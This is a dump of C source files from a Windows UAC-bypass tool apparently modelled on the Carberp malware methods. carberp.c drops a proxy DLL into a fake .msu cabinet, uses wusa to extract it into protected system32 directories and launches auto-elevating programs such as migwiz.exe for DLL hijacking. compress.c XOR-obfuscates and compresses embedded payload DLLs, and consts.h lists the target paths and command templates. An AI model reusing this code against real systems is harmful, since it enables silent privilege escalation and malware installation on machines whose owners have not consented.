 85 | 	);
 86 | 
 87 | typedef void(WINAPI *pfnSdbCloseDatabaseWrite)(
 88 | 	_Inout_  PDB pdb
 89 | 	);
 90 | 
 91 | typedef TAGID(WINAPI *pfnSdbBeginWriteListTag)(
 92 | 	_In_  PDB pdb,
 93 | 	_In_  TAG tTag
 94 | 	);
 95 | 
 96 | typedef BOOL(WINAPI *pfnSdbWriteStringTag)(
 97 | 	_In_  PDB pdb,
 98 | 	_In_  TAG tTag,
 99 | 	_In_  LPCWSTR pwszData
100 | 	);
101 | 
102 | typedef BOOL(WINAPI *pfnSdbEndWriteListTag)(
103 | 	_Inout_  PDB pdb,
104 | 	_In_     TAGID tiList
105 | 	);
106 | 
107 | typedef BOOL(WINAPI *pfnSdbWriteBinaryTag)(
108 | 	_In_  PDB pdb,
109 | 	_In_  TAG tTag,
110 | 	_In_  PBYTE pBuffer,
111 | 	_In_  DWORD dwSize
112 | 	);
113 | 
114 | typedef BOOL(WINAPI *pfnSdbWriteDWORDTag)(
115 | 	_In_  PDB pdb,
116 | 	_In_  TAG tTag,
117 | 	_In_  DWORD dwData
118 | 	);
119 | 
120 | typedef BOOL(WINAPI *pfnSdbStartIndexing)(
121 | 	_In_  PDB pdb,
122 | 	_In_  INDEXID iiWhich
123 | 	);
124 | 
125 | typedef void (WINAPI *pfnSdbStopIndexing)(
126 | 	_In_  PDB pdb,
127 | 	_In_  INDEXID iiWhich
128 | 	);
129 | 
130 | typedef BOOL(WINAPI *pfnSdbCommitIndexes)(
131 | 	_Inout_  PDB pdb
132 | 	);
133 | 
134 | typedef BOOL(WINAPI *pfnSdbDeclareIndex)(
135 | 	_In_   PDB pdb,
136 | 	_In_   TAG tWhich,
137 | 	_In_   TAG tKey,
138 | 	_In_   DWORD dwEntries,
139 | 	_In_   BOOL bUniqueKey,
140 | 	_Out_  INDEXID *piiIndex
141 | 	);
142 | 


--------------------------------------------------------------------------------
/BypassUAC/carberp.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016
  4 | *
  5 | *  TITLE:       CARBERP.C
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        16 Nov 2015
 10 | *
 11 | *  Tweaked Carberp methods.
 12 | *  Original Carberp is exploiting mcx2prov.exe in ehome.
 13 | *
 14 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 15 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 16 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 17 | * PARTICULAR PURPOSE.
 18 | *
 19 | *******************************************************************************/
 20 | #include "global.h"
 21 | #include "makecab.h"
 22 | 
 23 | /*
 24 | * ucmWusaExtractPackage
 25 | *
 26 | * Purpose:
 27 | *
 28 | * Extract cab to protected directory using wusa.
 29 | *
 30 | */
 31 | BOOL ucmWusaExtractPackage(
 32 | 	LPWSTR lpCommandLine
 33 | 	)
 34 | {
 35 | 	BOOL bResult = FALSE, cond = FALSE;
 36 | 	WCHAR szMsuFileName[MAX_PATH + 1];
 37 | 	WCHAR szCmd[MAX_PATH * 4];
 38 | 
 39 | 	RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
 40 | 
 41 | 	do {
 42 | 
 43 | 		if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
 44 | 			szMsuFileName, MAX_PATH) == 0)
 45 | 		{
 46 | 			break;
 47 | 		}
 48 | 
 49 | 		//extract msu data to target directory
 50 | 		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
 51 | 		wsprintfW(szCmd, lpCommandLine, szMsuFileName);
 52 | 		bResult = supRunProcess(L"cmd.exe", szCmd);
 53 | 		if (bResult == FALSE) {
 54 | 			break;
 55 | 		}
 56 | 
 57 | 	} while (cond);
 58 | 
 59 | 	if (szMsuFileName[0] != 0) {
 60 | 		DeleteFileW(szMsuFileName);
 61 | 	}
 62 | 	return bResult;
 63 | }
 64 | 
 65 | /*
 66 | * ucmWusaMethod
 67 | *
 68 | * Purpose:
 69 | *
 70 | * Build and install fake msu package then run target application.
 71 | *
 72 | */
 73 | BOOL ucmWusaMethod(
 74 | 	UACBYPASSMETHOD Method,
 75 | 	PVOID ProxyDll,
 76 | 	DWORD ProxyDllSize
 77 | 	)
 78 | {
 79 | 	BOOL bResult = FALSE, cond = FALSE;
 80 | 	LPWSTR lpSourceDll, lpCommandLine, lpTargetProcess;
 81 | 	WCHAR szCmd[MAX_PATH * 4];
 82 | 
 83 | 	if (
 84 | 		(ProxyDll == NULL) ||
 85 | 		(ProxyDllSize == 0)
 86 | 		)
 87 | 	{
 88 | 		return FALSE;
 89 | 	}
 90 | 
 91 | 	switch (Method) {
 92 | 
 93 | 	//use migwiz.exe as target
 94 | 	case UacMethodCarberp1:
 95 | 		lpSourceDll = METHOD_MIGWIZ_SOURCEDLL;
 96 | 		lpCommandLine = METHOD_MIGWIZ_CMDLINE;
 97 | 		lpTargetProcess = METHOD_MIGWIZ_TARGETAPP;
 98 | 		break;
 99 | 
100 | 	//use cliconfg.exe as target
101 | 	case UacMethodCarberp2:
102 | 		lpSourceDll = METHOD_SQLSRV_SOURCEDLL;
103 | 		lpCommandLine = METHOD_SQLSRV_CMDLINE;
104 | 		lpTargetProcess = METHOD_SQLSRV_TARGETAPP;
105 | 		break;
106 | 
107 | 	default:
108 | 		return FALSE;
109 | 	}
110 | 
111 | 	do {
112 | 
113 | 		//
114 | 		// Extract file to the protected directory
115 | 		// First, create cab with fake msu ext, second run fusion process.
116 | 		//
117 | 		if (!ucmCreateCabinetForSingleFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
118 | 			break;
119 | 		}
120 | 
121 | 		if (!ucmWusaExtractPackage(lpCommandLine)) {
122 | 			break;
123 | 		}
124 | 
125 | 		//run target process for dll hijacking
126 | 		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
127 | 		if (ExpandEnvironmentStringsW(lpTargetProcess,
128 | 			szCmd, MAX_PATH) == 0)
129 | 		{
130 | 			break;
131 | 		}
132 | 		bResult = supRunProcess(szCmd, NULL);
133 | 
134 | 	} while (cond);
135 | 
136 | 
137 | 	return bResult;
138 | }
139 | 
140 | /*
141 | * ucmCreateCabinetForSingleFile
142 | *
143 | * Purpose:
144 | *
145 | * Build cabinet for usage in methods where required 1 file.
146 | *
147 | */
148 | BOOL ucmCreateCabinetForSingleFile(
149 | 	LPWSTR lpSourceDll,
150 | 	PVOID ProxyDll,
151 | 	DWORD ProxyDllSize
152 | 	)
153 | {
154 | 	BOOL cond = FALSE, bResult = FALSE;
155 | 	CABDATA *Cabinet = NULL;
156 | 	WCHAR szDllFileName[MAX_PATH + 1];
157 | 	WCHAR szMsuFileName[MAX_PATH + 1];
158 | 
159 | 	if (
160 | 		(ProxyDll == NULL) ||
161 | 		(ProxyDllSize == 0)
162 | 		)
163 | 	{
164 | 		return FALSE;
165 | 	}
166 | 
167 | 	do {
168 | 
169 | 		//drop proxy dll
170 | 		RtlSecureZeroMemory(szDllFileName, sizeof(szDllFileName));
171 | 		if (ExpandEnvironmentStringsW(lpSourceDll,
172 | 			szDllFileName, MAX_PATH) == 0)
173 | 		{
174 | 			break;
175 | 		}
176 | 		if (!supWriteBufferToFile(szDllFileName, ProxyDll, ProxyDllSize)) {
177 | 			break;
178 | 		}
179 | 
180 | 		//build cabinet
181 | 		RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
182 | 		if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
183 | 			szMsuFileName, MAX_PATH) == 0)
184 | 		{
185 | 			break;
186 | 		}
187 | 		Cabinet = cabCreate(szMsuFileName);
188 | 		if (Cabinet) {
189 | 			lpSourceDll = _filenameW(szDllFileName);
190 | 			//put file without compression
191 | 			bResult = cabAddFile(Cabinet, szDllFileName, lpSourceDll);
192 | 			cabClose(Cabinet);
193 | 		}
194 | 		else {
195 | 			break;
196 | 		}
197 | 
198 | 	} while (cond);
199 | 
200 | 	return bResult;
201 | }
202 | 


--------------------------------------------------------------------------------
/BypassUAC/carberp.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
 4 | *
 5 | *  TITLE:       CARBERP.H
 6 | *
 7 | *  VERSION:     2.00
 8 | *
 9 | *  DATE:        16 Nov 2015
10 | *
11 | *  Prototypes and definitions for Carberp method.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 | 
21 | BOOL ucmWusaMethod(
22 | 	UACBYPASSMETHOD Method,
23 | 	PVOID ProxyDll,
24 | 	DWORD ProxyDllSize
25 | 	);
26 | 
27 | BOOL ucmWusaExtractPackage(
28 | 	LPWSTR lpCommandLine
29 | 	);
30 | 
31 | BOOL ucmCreateCabinetForSingleFile(
32 | 	LPWSTR lpSourceDll,
33 | 	PVOID ProxyDll,
34 | 	DWORD ProxyDllSize
35 | 	);
36 | 


--------------------------------------------------------------------------------
/BypassUAC/cmdline.c:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | 
  3 | BOOL GetCommandLineParamW(
  4 | 	IN	LPCWSTR	CmdLine,
  5 | 	IN	ULONG	ParamIndex,
  6 | 	OUT	LPWSTR	Buffer,
  7 | 	IN	ULONG	BufferSize,
  8 | 	OUT	PULONG	ParamLen
  9 | 	)
 10 | {
 11 | 	ULONG	c, plen = 0;
 12 | 	TCHAR	divider;
 13 | 
 14 | 	if (ParamLen != NULL)
 15 | 		*ParamLen = 0;
 16 | 
 17 | 	if (CmdLine == NULL) {
 18 | 		if ((Buffer != NULL) && (BufferSize > 0))
 19 | 			*Buffer = 0;
 20 | 		return FALSE;
 21 | 	}
 22 | 
 23 | 	for (c = 0; c <= ParamIndex; c++) {
 24 | 		plen = 0;
 25 | 
 26 | 		while (*CmdLine == ' ')
 27 | 			CmdLine++;
 28 | 
 29 | 		switch (*CmdLine) {
 30 | 		case 0:
 31 | 			goto zero_term_exit;
 32 | 
 33 | 		case '"':
 34 | 			CmdLine++;
 35 | 			divider = '"';
 36 | 			break;
 37 | 
 38 | 		default:
 39 | 			divider = ' ';
 40 | 		}
 41 | 
 42 | 		while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
 43 | 			plen++;
 44 | 			if (c == ParamIndex)
 45 | 				if ((plen < BufferSize) && (Buffer != NULL)) {
 46 | 					*Buffer = *CmdLine;
 47 | 					Buffer++;
 48 | 				}
 49 | 			CmdLine++;
 50 | 		}
 51 | 
 52 | 		if (*CmdLine != 0)
 53 | 			CmdLine++;
 54 | 	}
 55 | 
 56 | zero_term_exit:
 57 | 
 58 | 	if ((Buffer != NULL) && (BufferSize > 0))
 59 | 		*Buffer = 0;
 60 | 
 61 | 	if (ParamLen != NULL)
 62 | 		*ParamLen = plen;
 63 | 
 64 | 	if (plen < BufferSize)
 65 | 		return TRUE;
 66 | 	else
 67 | 		return FALSE;
 68 | }
 69 | 
 70 | BOOL GetCommandLineParamA(
 71 | 	IN	LPCSTR	CmdLine,
 72 | 	IN	ULONG	ParamIndex,
 73 | 	OUT	LPSTR	Buffer,
 74 | 	IN	ULONG	BufferSize,
 75 | 	OUT	PULONG	ParamLen
 76 | 	)
 77 | {
 78 | 	ULONG	c, plen = 0;
 79 | 	TCHAR	divider;
 80 | 
 81 | 	if (CmdLine == NULL)
 82 | 		return FALSE;
 83 | 
 84 | 	if (ParamLen != NULL)
 85 | 		*ParamLen = 0;
 86 | 
 87 | 	for (c = 0; c <= ParamIndex; c++) {
 88 | 		plen = 0;
 89 | 
 90 | 		while (*CmdLine == ' ')
 91 | 			CmdLine++;
 92 | 
 93 | 		switch (*CmdLine) {
 94 | 		case 0:
 95 | 			goto zero_term_exit;
 96 | 
 97 | 		case '"':
 98 | 			CmdLine++;
 99 | 			divider = '"';
100 | 			break;
101 | 
102 | 		default:
103 | 			divider = ' ';
104 | 		}
105 | 
106 | 		while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
107 | 			plen++;
108 | 			if (c == ParamIndex)
109 | 				if ((plen < BufferSize) && (Buffer != NULL)) {
110 | 					*Buffer = *CmdLine;
111 | 					Buffer++;
112 | 				}
113 | 			CmdLine++;
114 | 		}
115 | 
116 | 		if (*CmdLine != 0)
117 | 			CmdLine++;
118 | 	}
119 | 
120 | zero_term_exit:
121 | 
122 | 	if ((Buffer != NULL) && (BufferSize > 0))
123 | 		*Buffer = 0;
124 | 
125 | 	if (ParamLen != NULL)
126 | 		*ParamLen = plen;
127 | 
128 | 	if (plen < BufferSize)
129 | 		return TRUE;
130 | 	else
131 | 		return FALSE;
132 | }
133 | 
134 | char *ExtractFilePathA(const char *FileName, char *FilePath)
135 | {
136 | 	char *p = (char *)FileName, *p0 = (char *)FileName;
137 | 
138 | 	if ((FileName == 0) || (FilePath == 0))
139 | 		return 0;
140 | 
141 | 	while (*FileName != 0) {
142 | 		if (*FileName == '\\')
143 | 			p = (char *)FileName + 1;
144 | 		FileName++;
145 | 	}
146 | 
147 | 	while (p0 < p) {
148 | 		*FilePath = *p0;
149 | 		FilePath++;
150 | 		p0++;
151 | 	}
152 | 
153 | 	*FilePath = 0;
154 | 
155 | 	return FilePath;
156 | }
157 | 
158 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)
159 | {
160 | 	wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;
161 | 
162 | 	if ((FileName == 0) || (FilePath == 0))
163 | 		return 0;
164 | 
165 | 	while (*FileName != 0) {
166 | 		if (*FileName == '\\')
167 | 			p = (wchar_t *)FileName + 1;
168 | 		FileName++;
169 | 	}
170 | 
171 | 	while (p0 < p) {
172 | 		*FilePath = *p0;
173 | 		FilePath++;
174 | 		p0++;
175 | 	}
176 | 
177 | 	*FilePath = 0;
178 | 
179 | 	return FilePath;
180 | }
181 | 


--------------------------------------------------------------------------------
/BypassUAC/cmdline.h:
--------------------------------------------------------------------------------
 1 | #ifndef _CMDLINEH_
 2 | #define _CMDLINEH_
 3 | 
 4 | BOOL GetCommandLineParamW(
 5 | 	IN	LPCWSTR	CmdLine,
 6 | 	IN	ULONG	ParamIndex,
 7 | 	OUT	LPWSTR	Buffer,
 8 | 	IN	ULONG	BufferSize,
 9 | 	OUT	PULONG	ParamLen
10 | 	);
11 | 
12 | BOOL GetCommandLineParamA(
13 | 	IN	LPCSTR	CmdLine,
14 | 	IN	ULONG	ParamIndex,
15 | 	OUT	LPSTR	Buffer,
16 | 	IN	ULONG	BufferSize,
17 | 	OUT	PULONG	ParamLen
18 | 	);
19 | 
20 | char *ExtractFilePathA(const char *FileName, char *FilePath);
21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
22 | 
23 | #ifdef UNICODE
24 | 
25 | #define ExtractFilePath			ExtractFilePathW
26 | #define GetCommandLineParam		GetCommandLineParamW
27 | 
28 | #else // ANSI
29 | 
30 | #define ExtractFilePath			ExtractFilePathA
31 | #define GetCommandLineParam		GetCommandLineParamA
32 | 
33 | #endif
34 | 
35 | #endif /* _CMDLINEH_ */
36 | 


--------------------------------------------------------------------------------
/BypassUAC/compress.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016
  4 | *
  5 | *  TITLE:       COMPRESS.C
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        16 Nov 2015
 10 | *
 11 | *  Compression support.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | #include "global.h"
 20 | 
 21 | #ifndef _DEBUG
 22 | #undef GENERATE_COMPRESSED_PAYLOAD
 23 | #else
 24 | #ifdef _WIN64
 25 | #include "hibiki64.h"
 26 | #include "fubuki64.h"
 27 | #include "kongou64.h"
 28 | #else
 29 | #include "hibiki32.h"
 30 | #include "fubuki32.h"
 31 | #include "kongou32.h"
 32 | #endif
 33 | #endif
 34 | 
 35 | /*
 36 | * EncodeBuffer
 37 | *
 38 | * Purpose:
 39 | *
 40 | * Decrypt/Encrypt given buffer.
 41 | *
 42 | */
 43 | VOID EncodeBuffer(
 44 | 	PVOID Buffer,
 45 | 	ULONG BufferSize
 46 | 	)
 47 | {
 48 | 	ULONG k, c;
 49 | 	PUCHAR ptr;
 50 | 
 51 | 	if ((Buffer == NULL) || (BufferSize == 0))
 52 | 		return;
 53 | 
 54 | 	k = 'ftp2';
 55 | 	c = BufferSize;
 56 | 	ptr = Buffer;
 57 | 
 58 | 	do {
 59 | 		*ptr ^= k;
 60 | 		k = _rotl(k, 1);
 61 | 		ptr++;
 62 | 		--c;
 63 | 	} while (c != 0);
 64 | }
 65 | 
 66 | 
 67 | /*
 68 | * CompressBufferLZNT1
 69 | *
 70 | * Purpose:
 71 | *
 72 | * Compress given buffer with LZ algorithm.
 73 | *
 74 | * Use VirtualFree to release returned buffer when it no longer needed.
 75 | *
 76 | */
 77 | PUCHAR CompressBufferLZNT1(
 78 | 	_In_ PUCHAR SrcBuffer,
 79 | 	_In_ ULONG SrcSize,
 80 | 	_Inout_ PULONG FinalCompressedSize
 81 | 	)
 82 | {
 83 | 	BOOL cond = FALSE;
 84 | 	NTSTATUS status;
 85 | 	ULONG CompressedSize = 0;
 86 | 	ULONG CompressBufferWorkSpaceSize = 0;
 87 | 	ULONG CompressFragmentWorkSpaceSize = 0;
 88 | 	ULONG CompBufferSize = 0;
 89 | 	PVOID WorkSpace = NULL;
 90 | 	PUCHAR CompBuffer = NULL;
 91 | 
 92 | 	do {
 93 | 
 94 | 		status = RtlGetCompressionWorkSpaceSize(
 95 | 			COMPRESSION_FORMAT_LZNT1,
 96 | 			&CompressBufferWorkSpaceSize,
 97 | 			&CompressFragmentWorkSpaceSize
 98 | 			);
 99 | 
100 | 		//accept nothing but STATUS_SUCCESS
101 | 		if (status != STATUS_SUCCESS) {
102 | 			break;
103 | 		}
104 | 
105 | 		WorkSpace = (PVOID)VirtualAlloc(NULL, CompressBufferWorkSpaceSize, 
106 | 			MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
107 | 
108 | 		if (WorkSpace == NULL) {
109 | 			break;
110 | 		}
111 | 
112 | 		//original size + safe buffer + sizeof header
113 | 		CompBufferSize = SrcSize + 0x1000 + sizeof(ULONG);
114 | 		CompBuffer = (PUCHAR)VirtualAlloc(NULL, CompBufferSize, 
115 | 			MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
116 | 
117 | 		if (CompBuffer == NULL) {
118 | 			break;
119 | 		}
120 | 
121 | 		CompressedSize = 0;
122 | 		status = RtlCompressBuffer(
123 | 			COMPRESSION_FORMAT_LZNT1,
124 | 			SrcBuffer,
125 | 			SrcSize,
126 | 			&CompBuffer[4],
127 | 			CompBufferSize,
128 | 			4096,
129 | 			&CompressedSize,
130 | 			WorkSpace
131 | 			);
132 | 
133 | 		if (status != STATUS_SUCCESS) {
134 | 			VirtualFree(CompBuffer, 0, MEM_RELEASE);
135 | 			break;
136 | 		}
137 | 	
138 | 		*(PULONG)&CompBuffer[0] = SrcSize;//save original size
139 | 		CompressedSize += sizeof(ULONG); //add header size
140 | 		*FinalCompressedSize = CompressedSize;
141 | 
142 | 	} while (cond);
143 | 
144 | 	if (WorkSpace != NULL) {
145 | 		VirtualFree(WorkSpace, 0, MEM_RELEASE);
146 | 	}
147 | 
148 | 	return CompBuffer;
149 | }
150 | 
151 | /*
152 | * DecompressBufferLZNT1
153 | *
154 | * Purpose:
155 | *
156 | * Decompress buffer compressed with LZ algorithm.
157 | *
158 | * Use VirtualFree to release returned buffer when it no longer needed.
159 | *
160 | */
161 | PUCHAR DecompressBufferLZNT1(
162 | 	_In_ PUCHAR CompBuffer,
163 | 	_In_ ULONG CompSize,
164 | 	_In_ ULONG UncompressedBufferSize,
165 | 	_Inout_ PULONG FinalUncompressedSize
166 | 	)
167 | {
168 | 	PUCHAR UncompBuffer = NULL;
169 | 	NTSTATUS status;
170 | 
171 | 	UncompBuffer = (PUCHAR)VirtualAlloc(NULL, UncompressedBufferSize,
172 | 		MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
173 | 
174 | 	if (UncompBuffer == NULL) {
175 | 		return NULL;
176 | 	}
177 | 
178 | 	status = RtlDecompressBuffer(
179 | 		COMPRESSION_FORMAT_LZNT1,
180 | 		UncompBuffer,
181 | 		UncompressedBufferSize,
182 | 		CompBuffer,
183 | 		CompSize,
184 | 		FinalUncompressedSize
185 | 		);
186 | 
187 | 	if (status != STATUS_SUCCESS) { //accept only success value
188 | 		if (UncompBuffer) {
189 | 			VirtualFree(UncompBuffer, 0, MEM_RELEASE);
190 | 			UncompBuffer = NULL;
191 | 		}
192 | 	}
193 | 
194 | 	return UncompBuffer;
195 | }
196 | 
197 | #ifdef GENERATE_COMPRESSED_PAYLOAD
198 | 
199 | /*
200 | * CompressPayload
201 | *
202 | * Purpose:
203 | *
204 | * Create compressed and encrypted by xor files. Used only during development.
205 | * NOT for usage with release.
206 | *
207 | */
208 | VOID CompressPayload(
209 | 	VOID
210 | 	)
211 | {
212 | 	PUCHAR Data;
213 | 	ULONG FinalCompressedSize = 0;
214 | 
215 | #ifdef _WIN64
216 | 	Data = CompressBufferLZNT1((PUCHAR)Fubuki64, sizeof(Fubuki64), &FinalCompressedSize);
217 | #else
218 | 	Data = CompressBufferLZNT1((PUCHAR)Fubuki32, sizeof(Fubuki32), &FinalCompressedSize);
219 | #endif
220 | 
221 | 	if (Data) {
222 | 
223 | 		EncodeBuffer(Data, FinalCompressedSize);
224 | 
225 | #ifdef _WIN64
226 | 		supWriteBufferToFile(TEXT("fubuki64.cd"), Data, FinalCompressedSize);
227 | #else
228 | 		supWriteBufferToFile(TEXT("fubuki32.cd"), Data, FinalCompressedSize);
229 | #endif
230 | 		VirtualFree(Data, 0, MEM_RELEASE);
231 | 	}
232 | 
233 | 	FinalCompressedSize = 0;
234 | 
235 | #ifdef _WIN64
236 | 	Data = CompressBufferLZNT1((PUCHAR)Hibiki64, sizeof(Hibiki64), &FinalCompressedSize);
237 | #else
238 | 	Data = CompressBufferLZNT1((PUCHAR)Hibiki32, sizeof(Hibiki32), &FinalCompressedSize);
239 | #endif
240 | 	if (Data) {
241 | 
242 | 		EncodeBuffer(Data, FinalCompressedSize);
243 | 
244 | #ifdef _WIN64
245 | 		supWriteBufferToFile(TEXT("hibiki64.cd"), Data, FinalCompressedSize);
246 | #else
247 | 		supWriteBufferToFile(TEXT("hibiki32.cd"), Data, FinalCompressedSize);
248 | #endif
249 | 		VirtualFree(Data, 0, MEM_RELEASE);
250 | 	}
251 | 
252 | 	FinalCompressedSize = 0;
253 | 
254 | #ifdef _WIN64
255 | 	Data = CompressBufferLZNT1((PUCHAR)Kongou64, sizeof(Kongou64), &FinalCompressedSize);
256 | #else
257 | 	Data = CompressBufferLZNT1((PUCHAR)Kongou32, sizeof(Kongou32), &FinalCompressedSize);
258 | #endif
259 | 	if (Data) {
260 | 		
261 | 		EncodeBuffer(Data, FinalCompressedSize);
262 | 
263 | #ifdef _WIN64
264 | 		supWriteBufferToFile(TEXT("kongou64.cd"), Data, FinalCompressedSize);
265 | #else
266 | 		supWriteBufferToFile(TEXT("kongou32.cd"), Data, FinalCompressedSize);
267 | #endif
268 | 		VirtualFree(Data, 0, MEM_RELEASE);
269 | 	}
270 | }
271 | 
272 | #endif
273 | 
274 | /*
275 | * DecompressPayload
276 | *
277 | * Purpose:
278 | *
279 | * Decode payload and then decompress it.
280 | *
281 | */
282 | PVOID DecompressPayload(
283 | 	_In_ PVOID CompressedBuffer,
284 | 	_In_ ULONG CompressedBufferSize,
285 | 	_Inout_ PULONG DecompressedBufferSize
286 | 	)
287 | {
288 | 	BOOL     cond = FALSE, bResult;
289 | 	PUCHAR   Data = NULL, UncompressedData = NULL, Ptr;
290 | 	ULONG    FinalDecompressedSize = 0, k, c;
291 | 
292 | 	__try {
293 | 
294 | 		bResult = FALSE;
295 | 
296 | 		do {
297 | 
298 | 			Data = VirtualAlloc(NULL, CompressedBufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
299 | 			if (Data == NULL)
300 | 				break;
301 | 
302 | 			supCopyMemory(Data, CompressedBufferSize, CompressedBuffer, CompressedBufferSize);
303 | 
304 | 			EncodeBuffer(Data, CompressedBufferSize);
305 | 
306 | 			Ptr = Data;
307 | 			c = *(PULONG)&Ptr[0]; //query original size
308 | 			Ptr += sizeof(ULONG); //skip header
309 | 			k = CompressedBufferSize - sizeof(ULONG); //new compressed size without header
310 | 
311 | 			UncompressedData = DecompressBufferLZNT1(Ptr, k, c, &FinalDecompressedSize);
312 | 			if (UncompressedData == NULL)
313 | 				break;
314 | 
315 | 			//validate uncompressed data
316 | 			if (!supVerifyMappedImageMatchesChecksum(UncompressedData, FinalDecompressedSize)) {
317 | 				OutputDebugString(TEXT("Invalid file checksum"));
318 | 				break;
319 | 			}
320 | 
321 | 			bResult = TRUE;
322 | 
323 | 		} while (cond);
324 | 
325 | 	}
326 | 	__except (EXCEPTION_EXECUTE_HANDLER) {
327 | 		return NULL;
328 | 	}
329 | 
330 | 	if (Data != NULL) {
331 | 		VirtualFree(Data, 0, MEM_RELEASE);
332 | 	}
333 | 
334 | 	if (bResult == FALSE) {
335 | 		if (UncompressedData != NULL) {
336 | 			VirtualFree(UncompressedData, 0, MEM_RELEASE);
337 | 			UncompressedData = NULL;
338 | 		}
339 | 		FinalDecompressedSize = 0;
340 | 	}
341 | 
342 | 	if (DecompressedBufferSize) {
343 | 		*DecompressedBufferSize = FinalDecompressedSize;
344 | 	}
345 | 
346 | 	return UncompressedData;
347 | }
348 | 


--------------------------------------------------------------------------------
/BypassUAC/compress.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016
 4 | *
 5 | *  TITLE:       COMPRESS.H
 6 | *
 7 | *  VERSION:     2.00
 8 | *
 9 | *  DATE:        15 Nov 2015
10 | *
11 | *  Prototypes and definitions for compression.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 | 
21 | typedef PVOID (*pfnDecompressPayload)(
22 | 	_In_ PVOID CompressedBuffer,
23 | 	_In_ ULONG CompressedBufferSize,
24 | 	_Inout_ PULONG DecompressedBufferSize
25 | 	);
26 | 
27 | PUCHAR CompressBufferLZNT1(
28 | 	_In_ PUCHAR SrcBuffer,
29 | 	_In_ ULONG SrcSize,
30 | 	_Inout_ PULONG FinalCompressedSize
31 | 	);
32 | 
33 | PUCHAR DecompressBufferLZNT1(
34 | 	_In_ PUCHAR CompBuffer,
35 | 	_In_ ULONG CompSize,
36 | 	_In_ ULONG UncompressedBufferSize,
37 | 	_Inout_ PULONG FinalUncompressedSize
38 | 	);
39 | 
40 | VOID CompressPayload(
41 | 	VOID
42 | 	);
43 | 
44 | PVOID DecompressPayload(
45 | 	_In_ PVOID CompressedBuffer,
46 | 	_In_ ULONG CompressedBufferSize,
47 | 	_Inout_ PULONG DecompressedBufferSize
48 | 	);
49 | 


--------------------------------------------------------------------------------
/BypassUAC/consts.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
 4 | *
 5 | *  TITLE:       CONSTS.H
 6 | *
 7 | *  VERSION:     2.00
 8 | *
 9 | *  DATE:        16 Nov 2015
10 | *
11 | *  Global consts definition file.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 | 
21 | #define T_IFEO                L"MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"
22 | #define T_AVRFDLL             L"Hibiki.dll"
23 | #define T_AVRF_SOURCEDLL      L"%temp%\\Hibiki.dll"
24 | #define T_AVRF_CMDLINE        L"/c wusa %ws /extract:%%windir%%\\system32"
25 | #define T_WINSATSRC           L"%temp%\\winsat.exe"
26 | #define T_WINSAT_CMDLINE      L"/c wusa %ws /extract:%%windir%%\\system32\\sysprep"
27 | #define T_WINSAT_TARGET       L"%systemroot%\\system32\\sysprep\\winsat.exe"
28 | 
29 | #define T_IIS_TARGETDIR       L"%systemroot%\\system32\\inetsrv"
30 | #define T_IIS_TARGETAPP       L"InetMgr.exe"
